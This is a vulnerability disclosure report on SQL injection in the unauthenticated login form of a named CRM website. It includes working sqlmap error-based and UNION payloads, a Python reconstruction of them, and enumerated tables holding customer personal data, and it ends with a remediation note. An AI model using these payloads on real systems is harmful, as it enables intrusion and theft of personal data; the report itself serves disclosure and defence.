2015-09-20: Details reported to the vendor, awaiting vendor handling
2015-09-24: Vendor confirmed; details disclosed to the vendor only
2015-10-04: Details disclosed to core white hats and relevant domain experts
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to intern white hats
2015-11-08: Details disclosed to the public
As per the title: with this much data exposed, please route this to a major vendor.
Vulnerable system: CRM management system
Vulnerable URL / request:
POST /login.aspx HTTP/1.1
Host: crm.chinawutong.com
Content-Length: 460
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://crm.chinawutong.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://crm.chinawutong.com/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ypyhncvrkcp4jq45istarx55

__VIEWSTATE=%2FwEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy%2BPT8xnnTfEawqVDiAEYGXDvJB04%3D&__EVENTVALIDATION=%2FwEWBgKRyKDLDQLwkrODBALil%2B%2BSAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h%2FDWg&ctl00%24MainContent%24tbxUserName=admin&ctl00%24MainContent%24tbxPassWord=admin&ctl00%24MainContent%24txtCode=cerc&ctl00%24MainContent%24btnLogin=
The ctl00$MainContent$tbxUserName parameter is injectable: the backend is Microsoft SQL Server, and sqlmap confirmed both an error-based and a UNION vector. This is the unauthenticated login handler, so no account is needed, and both sqlmap payloads carry the same txtCode value (xfkt) across requests, which means the captcha did not stop repeated automated submissions.
---
Parameter: ctl00$MainContent$tbxUserName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' AND 2866=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2866=2866) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113))) AND 'CzCc'='CzCc&ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=

    Type: UNION query
    Title: Generic UNION query (NULL) - 33 columns
    Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(107)+CHAR(72)+CHAR(90)+CHAR(73)+CHAR(83)+CHAR(65)+CHAR(72)+CHAR(108)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=
---
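To make the two sqlmap vectors above legible, here is an added example (written for this edit, not code from the original report or from sqlmap) that rebuilds both payloads and shows how the extracted value is recovered from the response. The marker strings qpkzq and qqkvq are decoded from the CHAR() chains in the report; the error page and UNION page used as input are constructed stand-ins (the element id MainContent_lblMsg is invented), and the assumption that column 13 is the one echoed back is taken from where sqlmap placed the marker in the UNION payload. Nothing is sent over the network.

```python
"""Added example: mechanics of the error-based and UNION payloads sqlmap used
against ctl00$MainContent$tbxUserName. Responses below are constructed."""
import re
from typing import Optional
from urllib.parse import urlencode

# sqlmap brackets every extracted value with two random markers so it can find
# it in whatever page comes back. Decoded from the report's CHAR() chains:
#   CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113) -> "qpkzq"
#   CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113) -> "qqkvq"
PREFIX = "qpkzq"
SUFFIX = "qqkvq"


def decode_char_chain(expr: str) -> str:
    """'CHAR(113)+CHAR(112)' -> 'qp'. Inverse of char_chain()."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def char_chain(text: str) -> str:
    """Express a string as CHAR() concatenation. No quote characters are
    needed, so it survives inside the single-quoted context of the login query."""
    return "+".join(f"CHAR({ord(c)})" for c in text)


def error_based_payload(subquery: str) -> str:
    """Error-based vector from the report. CONVERT(INT, '<prefix><data><suffix>')
    can never succeed, and SQL Server quotes the offending string in its error
    message, so the data rides out in the error page."""
    inner = f"{char_chain(PREFIX)}+({subquery})+{char_chain(SUFFIX)}"
    return f"admin' AND 2866=CONVERT(INT,(SELECT {inner})) AND 'CzCc'='CzCc"


def union_payload(subquery: str, columns: int = 33, position: int = 13) -> str:
    """UNION vector from the report: 33 NULL columns to match the login query,
    data in column 13 (assumed, from the marker position, to be rendered)."""
    cols = ["NULL"] * columns
    cols[position - 1] = f"{char_chain(PREFIX)}+({subquery})+{char_chain(SUFFIX)}"
    return "admin' UNION ALL SELECT " + ",".join(cols) + "-- "


def extract(response_body: str) -> Optional[str]:
    """Return the value wrapped between the markers, or None if absent."""
    m = re.search(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX),
                  response_body, re.S)
    return m.group(1) if m else None


def login_form(username: str, viewstate: str, eventvalidation: str,
               captcha: str) -> dict:
    """The six POST fields from the report's request. __VIEWSTATE and
    __EVENTVALIDATION must be current values from a GET of login.aspx: with
    event validation on (the ASP.NET default) a stale or missing
    __EVENTVALIDATION is rejected before the login code runs."""
    return {
        "__VIEWSTATE": viewstate,
        "__EVENTVALIDATION": eventvalidation,
        "ctl00$MainContent$tbxUserName": username,
        "ctl00$MainContent$tbxPassWord": "admin",
        "ctl00$MainContent$txtCode": captcha,
        "ctl00$MainContent$btnLogin": "",
    }


# Constructed stand-in for the ASP.NET error page the error-based probe yields.
# The sentence is SQL Server's real conversion-failure message format.
FAKE_ERROR_PAGE = ("<title>Conversion failed when converting the varchar value "
                   "'qpkzq1qqkvq' to data type int.</title>")

# Constructed stand-in for a page that reflects column 13 of the UNION row.
FAKE_UNION_PAGE = '<span id="MainContent_lblMsg">qpkzqWutongCRMqqkvq</span>'


def demo() -> dict:
    """Rebuild the report's boolean probe, then a UNION read of DB_NAME()."""
    probe = "SELECT (CASE WHEN (2866=2866) THEN CHAR(49) ELSE CHAR(48) END)"
    body = urlencode(login_form(error_based_payload(probe),
                                "VIEWSTATE_PLACEHOLDER",
                                "EVENTVALIDATION_PLACEHOLDER", "xfkt"))
    return {
        "error_payload": error_based_payload(probe),
        "error_body": body,
        "error_result": extract(FAKE_ERROR_PAGE),    # "1": the CASE was true
        "union_payload": union_payload("SELECT DB_NAME()"),
        "union_result": extract(FAKE_UNION_PAGE),    # "WutongCRM"
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The error-based vector needs the application to leak the database error text into the page; the UNION vector needs one column of the login query to be rendered. Either condition alone is enough for full extraction, which is why sqlmap was able to walk every table count shown below through a login form.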
Databases:
Table row counts:
Database: WutongCRM
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.WTCRM_HND_ContactRecordOld                   | 1939015 |
| dbo.WTCRM_HND_ContactRecordOld                   | 1939015 |
| dbo.WTCRM_HND_CustomerInfo                       | 1576796 |
| dbo.VS_SYS_LogInfo                               | 950017  |
| dbo.WTCRM_SYS_LogInfo                            | 950017  |
| dbo.WTCRM_HND_VerfiyRecord                       | 684513  |
| dbo.WTCRM_HND_ConsultRecord                      | 602475  |
| dbo.WTCRM_HND_SeverRecordDelete                  | 446428  |
| dbo.WTCRM_HND_WorkRecord                         | 270504  |
| dbo.WTCRM_HND_RelationInfo                       | 231078  |
| dbo.WTCRM_SYS_EmailRecord                        | 224168  |
| dbo.WTCRM_HND_AllocateDetail                     | 191325  |
| dbo.WTCRM_HND_AllocateDetail                     | 191325  |
| dbo.WTCRM_HND_TemporaryCustomer                  | 186692  |
| dbo.WTCRM_HND_CensusInfo                         | 127971  |
| dbo.WTCRM_HND_ModifyInfo                         | 109814  |
| dbo.WTCRM_HND_ServiceRecord                      | 100772  |
| dbo.WTCRM_HND_WorkExamine                        | 63592   |
| dbo.WTCRM_HND_logRespondNotice                   | 63558   |
| dbo.WTCRM_HND_WXTOpenRecord                      | 43034   |
| dbo.WTCRM_HND_OrderRecord                        | 30579   |
| dbo.WTCRM_HND_AdvertRecord                       | 25792   |
| dbo.WTCRM_HND_OrderInfo                          | 24946   |
| dbo.WTCRM_HND_OrderPrintRecord                   | 24536   |
| dbo.WTCRM_PEP_ResumeRecord                       | 21791   |
| dbo.WTCRM_SYS_BadWord                            | 19873   |
| dbo.WTCRM_HND_UpdateRecord                       | 19039   |
| dbo.WTCRM_HND_MemberKindAlter                    | 13759   |
| dbo.WTCRM_HND_VisitRecord                        | 12320   |
| dbo.WTCRM_HND_OrderFullRecord                    | 10035   |
| dbo.WTCRM_HND_logRespondContact                  | 9745    |
| dbo.WTCRM_HND_ContactExamine                     | 9732    |
| dbo.WTCRM_PEP_ResumeInfo                         | 9133    |
| dbo.WTCRM_HND_PerfectDegree                      | 7435    |
| dbo.WTCRM_HND_UserDelRecord                      | 7434    |
| dbo.WTCRM_HND_AppliRemind                        | 6916    |
| dbo.WTCRM_HND_OrderAssociate                     | 6303    |
| dbo.WTCRM_SYS_PostRecord                         | 5885    |
| dbo.WTCRM_SYS_KnowledgeRecord                    | 5800    |
| dbo.WTCRM_SYS_KnowledgeShare                     | 5061    |
| dbo.WTCRM_HND_MaintainCar                        | 4987    |
| dbo.WTCRM_HND_Repeal                             | 4953    |
| dbo.WTCRM_HND_ServeInfo                          | 3265    |
| dbo.WTCRM_SYS_ListAreas                          | 3177    |
| dbo.WTCRM_HND_SyncRecord                         | 3107    |
| dbo.WTCRM_HND_AppliRecord                        | 3058    |
| dbo.WTCRM_SYS_UserChangeRecord                   | 2696    |
| dbo.WTCRM_HND_OrderInvoice                       | 2646    |
| dbo.WTCRM_SYS_DepartureRecord                    | 2435    |
| dbo.WTCRM_SYS_SalerStore                         | 2373    |
| dbo.WTCRM_SYS_UserInfo                           | 2202    |
| dbo.VS_SYS_UserInfo                              | 2198    |
| dbo.WTCRM_SYS_InvoiceRequest                     | 1638    |
| dbo.WTCRM_HND_SaleInfoFW                         | 1626    |
| dbo.WTCRM_HND_SaleInfoFW                         | 1626    |
| dbo.WTCRM_PEP_Archives                           | 1315    |
| dbo.WTCRM_PEP_ExamineXZ                          | 1263    |
| dbo.WTCRM_HND_ProxyMaterialsDetail               | 1243    |
| dbo.WTCRM_HND_ProxyMaterialsDetail               | 1243    |
| dbo.WTCRM_HND_Application                        | 1172    |
| cdc.lsn_time_mapping                             | 990     |
| dbo.WTCRM_HND_OrderSpareMoney                    | 869     |
| dbo.WTCRM_HND_AdvertOrderChange                  | 799     |
| dbo.CallAuth                                     | 752     |
| dbo.Hangup                                       | 752     |
| dbo.WTCRM_FWF_Huo                                | 674     |
| dbo.WTCRM_SYS_ElementInfo                        | 671     |
| dbo.WTCRM_HND_SaleBusinessPlan                   | 489     |
| dbo.WTCRM_HND_ComplaintInfo                      | 438     |
| dbo.WTCRM_PEP_Examine                            | 393     |
| dbo.WTCRM_PEP_PayCheck                           | 384     |
| dbo.WTCRM_PEP_PayChange                          | 353     |
| dbo.WTCRM_SYS_Citys                              | 337     |
| dbo.WTCRM_FWF_wshiMainline                       | 313     |
| dbo.WTCRM_HND_JudgeOrder                         | 275     |
| dbo.WTCRM_PEP_ResignInfo                         | 268     |
| dbo.CallEstablish                                | 246     |
| dbo.WTCRM_PEP_Becomes                            | 240     |
| dbo.WTCRM_PEP_LogisticsGrade                     | 237     |
| dbo.WTCRM_PEP_ConnectInfo                        | 230     |
| dbo.WTCRM_FWF_VehicleLine                        | 209     |
| dbo.WTCRM_FWF_VehicleLine                        | 209     |
| dbo.WTCRM_SYS_Domain                             | 187     |
| dbo.WTCRM_SYS_Suggestion                         | 179     |
| dbo.WTCRM_HND_Impression                         | 174     |
| dbo.WTCRM_SYS_TeamInfo                           | 167     |
| dbo.WTCRM_SYS_GroupInfo                          | 137     |
| dbo.WTCRM_SYS_RoleInfo                           | 129     |
| dbo.WTCRM_SYS_SubStation                         | 120     |
| dbo.WTCRM_PEP_StationChange                      | 113     |
| dbo.WTCRM_PEP_SalerGrade                         | 95      |
| dbo.WTCRM_PEP_WebAndPosition                     | 88      |
| dbo.WTCRM_HND_ProxyInfo                          | 38      |
| dbo.WTCRM_SYS_AllAgents                          | 38      |
| dbo.WTCRM_SYS_OrderType                          | 37      |
| dbo.WTCRM_SYS_Materials                          | 34      |
| dbo.WTCRM_SYS_Provinces                          | 34      |
| cdc.captured_columns                             | 33      |
| dbo.WTCRM_HND_ContactExamineS                    | 33      |
| dbo.WTCRM_SYS_TargetSaler                        | 26      |
| dbo.WTCRM_HND_OrderVerify                        | 24      |
| dbo.WTCRM_SYS_Announcement                       | 24      |
| dbo.WTCRM_SYS_DepartmentInfo                     | 24      |
| dbo.WTCRM_HND_Elegant                            | 22      |
| dbo.WTCRM_SYS_OpenAreas                          | 21      |
| dbo.WTCRM_SYS_VOIDAPPID                          | 21      |
| dbo.WTCRM_SYS_KeyWords                           | 17      |
| dbo.WTCRM_SYS_CustomerProtected                  | 16      |
| dbo.WTCRM_HND_LinkLimits                         | 14      |
| dbo.WTCRM_HND_TechnologyLog                      | 14      |
| dbo.WTCRM_PEP_Wonderful                          | 14      |
| cdc.dbo_WTCRM_SYS_UserInfo_CT                    | 11      |
| dbo.WTCRM_SYS_Region                             | 8       |
| dbo.WTCRM_PEP_Recommend                          | 5       |
| dbo.WTCRM_SYS_BaseLimits                         | 4       |
| dbo.WTCRM_SYS_TemplateLimits                     | 4       |
| cdc.change_tables                                | 1       |
| cdc.index_columns                                | 1       |
| dbo.WTCRM_FWF_CarTolls                           | 1       |
| dbo.WTCRM_FWF_PeiHuo                             | 1       |
| dbo.WTCRM_HND_VipVehicleInfo                     | 1       |
+--------------------------------------------------+---------+

Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 98318   |
| sys.sysmessages                                  | 98318   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 11966   |
| sys.all_parameters                               | 7090    |
| sys.system_parameters                            | 7090    |
| sys.trace_subclass_values                        | 5366    |
| sys.all_columns                                  | 4670    |
| sys.system_columns                               | 4626    |
| sys.trace_event_bindings                         | 4304    |
| sys.syscomments                                  | 2994    |
| dbo.spt_values                                   | 2508    |
| sys.all_objects                                  | 1934    |
| sys.sysobjects                                   | 1934    |
| sys.system_objects                               | 1928    |
| sys.database_permissions                         | 1844    |
| sys.syspermissions                               | 1844    |
| sys.sysprotects                                  | 1843    |
| sys.all_sql_modules                              | 1783    |
| sys.system_sql_modules                           | 1783    |
| sys.dm_audit_actions                             | 454     |
| sys.spatial_reference_systems                    | 390     |
| sys.event_notification_event_types               | 365     |
| sys.all_views                                    | 354     |
| sys.system_views                                 | 354     |
| sys.trigger_event_types                          | 245     |
| sys.trace_events                                 | 180     |
| sys.allocation_units                             | 128     |
| sys.partitions                                   | 116     |
| sys.syscharsets                                  | 114     |
| sys.xml_schema_facets                            | 112     |
| sys.xml_schema_components                        | 99      |
| sys.system_components_surface_area_configuration | 95      |
| sys.dm_audit_class_type_map                      | 83      |
| sys.xml_schema_types                             | 82      |
| sys.configurations                               | 70      |
| sys.sysconfigures                                | 70      |
| sys.syscurconfigs                                | 70      |
| sys.trace_columns                                | 66      |
| sys.fulltext_document_types                      | 50      |
| sys.fulltext_languages                           | 48      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.syslanguages                                 | 33      |
| sys.securable_classes                            | 22      |
| sys.trace_categories                             | 21      |
| sys.xml_schema_component_placements              | 18      |
| INFORMATION_SCHEMA.SCHEMATA                      | 15      |
| sys.schemas                                      | 15      |
| sys.xml_schema_attributes                        | 15      |
| sys.database_principals                          | 14      |
| sys.sysusers                                     | 14      |
| sys.database_recovery_status                     | 13      |
| sys.databases                                    | 13      |
| sys.sysdatabases                                 | 13      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.assembly_types                               | 3       |
| sys.service_queue_usages                         | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+

Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 910     |
| dbo.backupmediafamily                            | 455     |
| dbo.backupmediaset                               | 455     |
| dbo.backupset                                    | 455     |
| dbo.restorefilegroup                             | 4       |
| dbo.restorefilegroup                             | 4       |
| dbo.restorehistory                               | 4       |
| dbo.syspolicy_configuration                      | 4       |
+--------------------------------------------------+---------+
Customer table:
Every kind of personal and contact detail; far too much to list.
Database: WutongCRM
Table: WTCRM_HND_CustomerInfo
[32 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| Area          | varchar  |
| Attribution   | varchar  |
| CellPhone     | varchar  |
| City          | varchar  |
| CompanyKind   | varchar  |
| CompanyName   | varchar  |
| Country       | varchar  |
| CurrentStatus | varchar  |
| CustomerID    | int      |
| CustomerKind  | varchar  |
| CustomerName  | varchar  |
| DataBaseID    | int      |
| DetailAddress | varchar  |
| Email         | varchar  |
| Fax           | varchar  |
| IsAdvisory    | int      |
| IsShow        | bit      |
| ModifyTime    | datetime |
| ModifyUserID  | int      |
| OrderID       | int      |
| Position      | varchar  |
| Province      | varchar  |
| QQ            | varchar  |
| RecordMethod  | varchar  |
| RecordTime    | datetime |
| RenewStatus   | varchar  |
| Role          | varchar  |
| SaleID        | int      |
| Sex           | varchar  |
| TelePhone     | varchar  |
| UserID        | int      |
| Verify        | int      |
+---------------+----------+
Fix: filter the input. The username is being concatenated into the login query; bind it as a query parameter rather than building the SQL string, and stop returning database error text to the client.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-09-24 11:04
Thank you for your support.
None yet.